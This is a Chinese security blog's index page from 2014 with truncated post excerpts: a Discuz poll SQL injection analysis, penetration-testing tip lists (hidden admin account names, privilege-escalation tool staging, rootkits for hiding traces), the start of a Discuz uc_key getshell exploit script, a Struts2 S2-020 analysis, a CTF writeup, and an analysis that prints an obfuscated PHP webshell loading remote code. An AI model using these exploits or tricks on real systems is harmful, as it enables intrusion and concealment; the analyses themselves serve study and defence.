显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Minghacker

凡你醉处 你说过 皆非他乡

 
 
 
 

焦点头图

 
 
聚焦图片加载中...
 
 
 
 
 

Every Second Counts

 
 
模块内容加载中...
 
 
 
 
 
 
 

Discuz 5.x/6.x/7.x投票SQL注入分析

2014-8-23 13:10:44 阅读258 评论0 232014/08 Aug23

看乌云有人爆了这个漏洞:http://www.wooyun.org/bugs/wooyun-2014-071516

感觉应该是editpost.inc.php里投票的漏洞。因为dz已经确定不会再修补7.x以前的漏洞了,所以直接贴细节吧 。

问题出在 editpost.inc.php的281行,对用户提交的polloption数组直接解析出来带入SQL语句,因为默认只对数组值过滤,而不过滤键,所以会导致一个DELETE注入。

$pollarray['options'] = $polloption; if($pollarray['options']) { if(count($pollarray['options']) > $maxpolloptions) { showmessage('post_poll_option_toomany'); } foreach($pollarray['options'] as $key => $value) { //这里直接解析出来没处理$key if(!trim($value)) { $db->query("DELETE FROM {$tablepre}polloptions WH

作者  | 2014-8-23 13:10:44 | 阅读(258) |评论(0) | 阅读全文>>

【渗透笔记】(柒+拾)

2014-8-23 13:02:11 阅读327 评论0 232014/08 Aug23

【渗透笔记】柒

1.提权后进入远程桌面发现 desktop locker(桌面锁)

解决方法:

ctrl+shift+esc 一直按会出现资源管理器,鼠标结束desktop locker即可

2.3389低权限用户提权(这个情况似乎比较少见?)的时候或者日常渗透用软件的时候可以

subst x: D:\XXX 用命令创建 X盘符 远程桌面连接器-本地资源-详细信息 -驱动器-勾选新增的X盘符

可以把本地驱动器映射到远程3389服务器上的X盘,放上常用提权工具方便渗透。

3.Rootkits:

Rootkits是linux/unix获取root权限之后使得攻击者可以隐藏自己的踪迹和保留root访问权限的神器,通常攻击者使用 rootkit的检查系统查看是否有其他的用户登录,如果只有自己,攻击者就开始着手清理日志中的有关信息,通过rootkit的嗅探器还可以获得其他系 统的用户和密码!

目前常用的有:t0rn /mafix/enyelkm 等等。

Rootkits通常分为:应用级别—内核级别—-硬件级别,早期的是rootkit主要为应用级rootkit通过替换login、ps、ls、 netstat等系统工具或修改.rhosts等系统配置文件等实现隐藏后门,硬件级RootKits主要是指Bios Rootkits,能够在系统加载前获得控制权,通过向磁盘中写入文件

作者  | 2014-8-23 13:02:11 | 阅读(327) |评论(0) | 阅读全文>>

【渗透笔记】(伍+陆)

2014-5-18 21:49:10 阅读357 评论0 182014/05 May18

  【渗透笔记】伍

http://www.91ri.org/7855.html

1、小小一招,让你的电脑安全起来:在“运行”对话框中输入“gpedit.msc”打开“本地组策略编辑器”窗口,展开“用户配置/管理模板/系统”目录,可双击配置禁止运行指定程序、禁止访问注册表、禁止访问命令提示符、禁止访问控制面板等策略。

2、在注册表编辑器中,依次打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug分支,双击“Auto”键值项,可以防止系统隐私信息被泄露。(应该是禁止生成dmp文件。)

3、HTTP协议代理服务器常用端口号:

80(Apache服务器默认、Nginx服务器默认、lighttpd服务器默认)

8080(tomcat服务器默认、kangle服务器默认)

3128(Squid服务器默认)

8081(用户习惯)

9080(WebSphere服务器默认)

7001(weblogic的默认端口)

4、在php.ini禁止一些危险函数的执行:

如果不希望执行包括system()等在那的能够执行命令的php函数,或者能够查看php信息的phpinfo()等函数,那么我们就可以禁止它们:

作者  | 2014-5-18 21:49:10 | 阅读(357) |评论(0) | 阅读全文>>

【渗透笔记】(叁+肆)

2014-5-18 21:36:42 阅读403 评论0 182014/05 May18

【渗透笔记】(叁)

http://www.91ri.org/7765.html

我们新开的栏目:【学习笔记】旨在与小伙伴们分享小编们的学习心得,渗透测试笔记连载由91ri网络安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享~

1、提权简单归纳一下,可以分为系统设置与第三方软件缺陷提权、溢出提权、社会工程学提权。

2、asp webshell想要执行cmd命令,需要具备一起其中任一个组件:wscript.shell、wscript.shell1、shell applition、shell applition1

3、有时候添加账号没成功可能是服务器的强密码策略(万恶的2008),改个超强度的密码再往死里整吧。

4、有时候能够添加用户,但是不能添加管理员组,这时候考虑是不是管理员组被改名了。可以利用net user administrator查看管理员所属的组来确定名称。

5、添加账号一个小小技巧,妙用无限:在添加账号时,将账号名设为“ ”(引号里的字符为搜狗拼音打v+1时候的d项),不懂什么意思,net user一下你就知道这个淫荡的技巧了。

作者  | 2014-5-18 21:36:42 | 阅读(403) |评论(0) | 阅读全文>>

【渗透笔记】(壹+贰)

2014-5-18 20:42:04 阅读472 评论0 182014/05 May18

本文转自:91ri.org

我们新开的栏目:【学习笔记】旨在与小伙伴们分享小编们的学习心得,渗透测试笔记连载由91ri网络安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享~

【渗透笔记】(壹)

http://www.91ri.org/7674.html

1、避免0day攻击的最好办法是实现启发式(Heuristic)或基于轮廓(Profile-based)的入侵检测系统。

2、常见的安全证书包括CCIE: Security、CEH、CISSP、CCSP、GIAC、OPSTA和Security+。

3、Nmap扫描主机开放端口,能够在运行IPSec的OpenBSD 2.7 系统上引发DOS攻击。当使用-sO选项运行Nmap时,就会引起OpenBSD系统奔溃。

4、现在已知端口扫描能够在下述环境中引发DOS攻击:Efficient Networks Routers、pcAnywhere9.0、安装了Novell intraNetWare Client的Windows 95/98。

作者  | 2014-5-18 20:42:04 | 阅读(472) |评论(0) | 阅读全文>>

Emeditor去重复行

2014-5-18 10:48:24 阅读292 评论0 182014/05 May18

一直认为Emeditor是几乎最强大的编辑器了,很多功能有需求的时候才去查,譬如去重复行,py脚本也能分分钟搞定的。

Emeditor去重复行有2种方法:

1.最简单的方法:

注意:必须是数据完全相同的重复行才能被成功删除掉,否则哪怕是多一个空格,EmEditor也不会将其算作重复行。

2.保存成1.jsee宏:

var s = document.selection.Text;

var ss = s.split("\r\n");

var Out = "";

var i = 0, j = 0, FindIt = false;

var OutArray = new Object();

for ( i=0; i<ss.length; i++ ) {

OutArray[ss[i]] = "";

}

for ( var key in OutArray ) {

Out += key + "\r\n"

}

然后Emeditor宏菜单打开。

作者  | 2014-5-18 10:48:24 | 阅读(292) |评论(0) | 阅读全文>>

Discuz X1.5 X2.5 X3 uc_key getshell

2014-5-8 22:45:06 阅读689 评论0 82014/05 May8

一、Discuz X1.5 X2.5 X3用uc_key来get webshell

uc_key是UC客户端与服务端通信的通信密钥。因此使用uc_key来fetshell只能获取UCenter Client的webshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的(不过可以通过uc_key来将服务器上的数据并重置用户口令)。

漏洞很早就有了(Oldjun发的7.0-7.2! Wooyun上猪猪侠一直喜欢这招   至于uc_key嘛从备份或者svn源码弄来呗)

提供两个版本

<?php // 代码版权归原作者所有! $timestamp = time()+10*3600; $host="127.0.0.1"; $uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd"; $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key)); $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://xxx\');e

作者  | 2014-5-8 22:45:06 | 阅读(689) |评论(0) | 阅读全文>>

Struts2 S2-020在Tomcat 8下的命令执行分析

2014-4-26 18:29:40 阅读297 评论0 262014/04 Apr26

From:http://sec.baidu.com/index.php?research/detail/id/18

作者:neobyte

时间:2014-04-03

Struts S2-020这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成DOS、文件下载等危害,相信各大厂商也已经采取了相应的安全措施。今天是和大家分享一下对这个漏洞的一点研究,包括如何在Tomcat 8下导致RCE,目的是抛砖引玉,有不足之处欢迎大家指出。

1.属性列举

这个漏洞分析的一个难点在于:通过ognl的class.xx这种方式来遍历属性时,得到的是实际运行环境中的动态class,因此仅作静态分析是很困难的。例如classLoader,在不同容器中就各不相同。于是我编写了一个小脚本来自动枚举这样的属性:(这段脚本只考虑了int、string与boolean这些基本属性,未考虑数组等复杂的情况,实际情况下结果会更多)

<%@ page language="java" import="java.lang.reflect.*" %> <%! public void processClass(Object instance, javax.servlet.jsp.JspWriter out, java.util.HashSet set, String poc){ try

作者  | 2014-4-26 18:29:40 | 阅读(297) |评论(0) | 阅读全文>>

python轻松读取sqlite

2014-4-14 20:34:02 阅读279 评论0 142014/04 Apr14

#-*- coding:utf-8 -*-

import sqlite3

cx = sqlite3.connect("GPClient.db")

cu = cx.cursor()

cu.execute("select * from Login")

a = cu.fetchall()

print a

作者  | 2014-4-14 20:34:02 | 阅读(279) |评论(0) | 阅读全文>>

闲扯“心脏出血”的OpenSSL漏洞

2014-4-11 21:28:54 阅读319 评论4 112014/04 Apr11

openssl漏洞出现快一周了,我也看到各大运维简单的升级修复和甲方乙方的忙碌和一起大黑客的身影。

#http://yxmhero1989.blog.163.com/blog/static/112157956201431191123404/

洞因

OpenSSL在处理心跳请求包时,没有对length字段(占2byte,可以标识的数据长度为64KB)和后续的data字段做合规检测。生成心跳响应包时,直接用了length对应的长度,从堆空间申请了内存,既便是真正的请求data数据远远小于length标识的长度。造成了可以读取内存64k的内容,而这些内容有你无法想象的内容,可能有cookie,有密码

,有源代码。。。

受影响版本

OpenSSL1.0.1、1.0.1a 、1.0.1b 、1.0.1c 、1.0.1d 、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本。

影响面

该漏洞不仅是涉及到https开头的网址,还包含间接使用了OpenSSL代码的产品和服务,比如,VPN、邮件系统、FTP工具等产品和服务,甚至可能会涉及到其他一些安全设施的源代码。

作者  | 2014-4-11 21:28:54 | 阅读(319) |评论(4) | 阅读全文>>

WinRar 4.20 – 文件扩展名欺骗(0Day)

2014-3-29 19:34:48 阅读314 评论0 292014/03 Mar29

WinRar 是常用的压缩与解压缩软件工具。它能将数据压缩成.rar或则.zip格式的包。这篇文章就是给大家呈现Winrar 4.20的一个最新漏洞(0 day),下面是关于zip文件的相关简要介绍。

Offset Bytes Description[25] 00 4 Local file header signature = 0x04034b50 (read as a little-endian number) 04 2 Version needed to extract (minimum) 06 2 General purpose bit flag 08 2 Compression method 10 2 File last modification time 12 2 File last modification date 14 4 CRC-32 18 4 Compressed size 22 4 Uncompressed size 26 2 File name length

作者  | 2014-3-29 19:34:48 | 阅读(314) |评论(0) | 阅读全文>>

超过16W的WordPress网站被用来做DDoS攻击

2014-3-19 22:27:16 阅读408 评论0 192014/03 Mar19

From:http://drops.wooyun.org/news/1062

任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。

看如下日志:

1

2

3

4

5

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"

121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"

217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"

193.197.34.216 - - [09/Mar/2014:11:05:27 -0400]

作者  | 2014-3-19 22:27:16 | 阅读(408) |评论(0) | 阅读全文>>

BCTF Writeup

2014-3-19 21:54:31 阅读1320 评论2 192014/03 Mar19

From:http://drops.wooyun.org/papers/1071

team:我是狗汪汪

author:redrain,金龟子,ztz,hellove,cbuteng,琴心剑气,saline

0x00 MISCMISC100初来乍到

描述

米特尼克刚到中国人生地不熟,想要找到一些中国的黑客朋友帮助他,他知道Capture The Flag夺旗竞赛是黑客云集的地方,于是也报名参加了中国第一次全国性的CTF大赛 @BCTF百度杯网络安全技术对抗赛。而要进入BCTF圈交流,米特尼克需关注并@BCTF百度杯网络安全技术对抗赛,才能找到一个密语。

解题

很简单,微博上at了后会多个粉丝,查看简介即有flag。

MISC200内网冒险

描述

为了收集更多参加 BCTF 大赛的中国黑客朋友的信息,米特尼克决定尝试渗透进入 BCTF 的内网以获取更多的信息。通过信息搜集和网络监听,他发现了进入内部数据库的一个入口代理,并且在代理入口处拿到了少量流量数据。正当他想继续收集更多信 息的时候,他的行迹被发现并被踢出了网络。 http://bctf.cn/files/downloads /misc200_23633b6b34ccf6f2769d35407f6b2665.pcap 入口代理:218.2.197.236:12345

作者  | 2014-3-19 21:54:31 | 阅读(1320) |评论(2) | 阅读全文>>

Struts2的getClassLoader漏洞利用

2014-3-19 21:32:30 阅读311 评论0 192014/03 Mar19

From:http://drops.wooyun.org/papers/1151

博文作者:By 空虚浪子心 http://www.inbreak.net

0x00 摘要

2012年,我在《攻击JAVA WEB》,文中提多关于“classLoader导致特定环境下的DOS漏洞”,当时并没有更加深入的说明,这几天struts官方修补了这个漏洞,本文是对这个漏洞的深入研究。

0x01 正文

这一切,得从我们控制了classLoader说起,曾经写过一篇文章,提到了一个小小的技术细节,非常不起眼的一个鸡肋。 引用《Spring framework(cve-2010-1622)漏洞利用指南》

Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]=xxx时,直接爆字段类型转换错误,结果才侥幸逃过一劫罢了。

tomcat8.0出来后,这个问题爆发了,这是一个鸡肋漏洞的逆袭。

作者  | 2014-3-19 21:32:30 | 阅读(311) |评论(0) | 阅读全文>>

PHP后门新玩法:一款猥琐的PHP后门分析

2014-3-19 21:17:50 阅读457 评论0 192014/03 Mar19

作者: GENXOR   [转载请注明出处自  :  360网站卫士博客-blog.wangzhan.360.cn]

0x00 背景

近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。

0x01 细节

Webshell代码如下:

1

2

3

4

5

6

7

8

9

<?php

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_repla

作者  | 2014-3-19 21:17:50 | 阅读(457) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 

阁主寄语

 
 
模块内容加载中...
 
 
 
 
 
 
 

上海市 徐汇区 摩羯座

 发消息  写留言

 
一个在当地较为英俊的人。一堆好人卡,已经有一株鲜花绑定好了,是小北的小太阳臭螃蟹。爱好写词摄影和美女。专注编程和安全。略懂,略懂 CSS+Js+jquery+php+python+perl+Yii+SSH+Flex+as3+asp.net。略懂C++/C#/WPF/Java/Delphi/VB/Asm/Qt。
 
近期心愿却道天凉好个秋
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

日志分类

 
 
日志分类列表加载中...
 
 
 
 
 

标签

 
 
数据加载中...
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 
 
博友列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
日志评论
评论列表加载中...
 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 

轻松一刻

 
 
模块内容加载中...
 
 
 
 
 

藏书一叠

 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
网易云音乐 曲目表歌词秀
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2014

创建博客 登录  
 加关注